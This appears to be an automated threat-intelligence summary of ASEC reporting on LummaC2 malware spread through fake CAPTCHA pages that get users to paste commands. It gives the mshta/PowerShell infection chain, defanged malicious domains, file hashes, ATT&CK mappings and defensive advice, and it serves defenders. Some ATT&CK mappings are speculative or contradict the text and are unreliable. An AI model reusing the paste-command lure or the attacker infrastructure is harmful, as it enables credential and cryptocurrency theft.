Full Report
AhnLab SEcurity intelligence Center (ASEC) previously introduced the DarkGate malware which spreads using the paste function in a blog post. Warning Against Phishing Emails Prompting Execution of Commands via Paste (CTRL+V) The distribution method in this case initially involved spreading malware through HTML attachments disguised as MS Word files in phishing emails. However, LummaC2 has […]
Analysis Summary
# Tool/Technique: LummaC2
## Overview
LummaC2 is an infostealer malware capable of stealing sensitive information such as browser data and cryptocurrencies. It is currently being distributed via phishing campaigns and fake CAPTCHA verification pages.
## Technical Details
- Type: Malware family
- Platform: Windows (implied by use of `mshta.exe` and PowerShell)
- Capabilities: Information theft (browser data, cryptocurrencies), clipboard monitoring/modification (ClipBanker module).
- First Seen: Information about the initial distribution via fake CAPTCHA is recent; LummaC2 itself was previously documented being distributed via illegal cracks.
## MITRE ATT&CK Mapping
The observed distribution and execution chain suggest several key techniques:
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Initial vector mentioned)
- **TA0002 - Execution**
- T1202 - Indirect Command Execution (Triggering command execution via clipboard interaction)
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell (via `mshta.exe`)
- T1059.005 - Visual Basic
- T1059.006 - Python (Not explicitly mentioned, but PowerShell is heavily used)
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Obfuscated HTA content, AES-encrypted PowerShell payload)
- **TA0008 - Lateral Movement** (Not explicitly confirmed in this chain, but common for stealers)
- **TA0010 - Exfiltration** (Implied through information theft capabilities)
## Functionality
### Core Capabilities
- Stealing information stored in web browsers.
- Stealing cryptocurrency wallet data.
- Utilizing a PowerShell script loader for execution.
### Advanced Features
- **ClipBanker Module:** Monitors the clipboard and replaces discovered cryptocurrency wallet addresses with the threat actor's controlled wallet address.
- **Chain Execution:** Involves multiple stages: Fake CAPTCHA -> Clipboard command -> `mshta.exe` execution of an obfuscated HTA file (`web44.mp4` extension used misleadingly) -> AES-decrypted PowerShell script -> download/execution of final PowerShell script (`web.png`) -> LummaC2 execution.
- **C2 Communication:** Uses unique identifiers (`hwid`, `pid`, `lid`) to track infected systems and data types being harvested.
## Indicators of Compromise
- File Hashes:
- MD5: `3099830291f5dfb199b1f6649997fb45`, `3734e365ab10e73a85320916ba49c3ee`, `af46bc7df8441c09296666f0053fb000`, `e7677ec2ca8706708bcd64b7b8e7111d`
- File Names: `web44.mp4` (HTA file), `web.png` (PowerShell script)
- Registry Keys: Not explicitly listed.
- Network Indicators:
- `https://cc[.]klipjaqemiu[.]shop/web[.]png`
- `https://klipjaqemiu[.]shop/web44[.]mp4`
- `https://noisercluch[.]click/api`
- Behavioral Indicators:
- Execution via `mshta.exe` loading suspicious external files.
- Use of obfuscated HTA files that secretly contain HTML/script content.
- In-memory execution of AES-encrypted PowerShell scripts.
- Clipboard monitoring and modification (ClipBanker activity).
## Associated Threat Actors
The specific threat actor group is not named, but the article notes LummaC2 was previously distributed disguised as illegal cracks, suggesting actors targeting general masses or users seeking pirated software.
## Detection Methods
- Signature-based detection: Utilize provided file hashes for file scanning.
- Behavioral detection: Monitor for processes that execute commands instructing copy actions via shortcuts/clipboard manipulation on websites, and subsequent execution of HTA files by legitimate system utilities like `mshta.exe` loading web content.
- YARA rules: Not provided in the context.
## Mitigation Strategies
- Users should exercise extreme caution with emails and websites of unclear origin, especially those prompting authentication or interactions on non-standard pages (like fake CAPTCHAs).
- Implement robust email and web filtering to block access to known malicious domains.
- Disable or restrict the execution of scripting engines (`mshta.exe`, PowerShell) where appropriate, or enforce application control policies.
- Educate users about social engineering tactics, such as executing commands copied to the clipboard via keyboard shortcuts (CTRL+V).
## Related Tools/Techniques
- DarkGate (Mentioned as previously analyzed malware distributed via blog pastes.)
- LummaC2 (The ultimate payload; detailed analysis exists in a separate linked article.)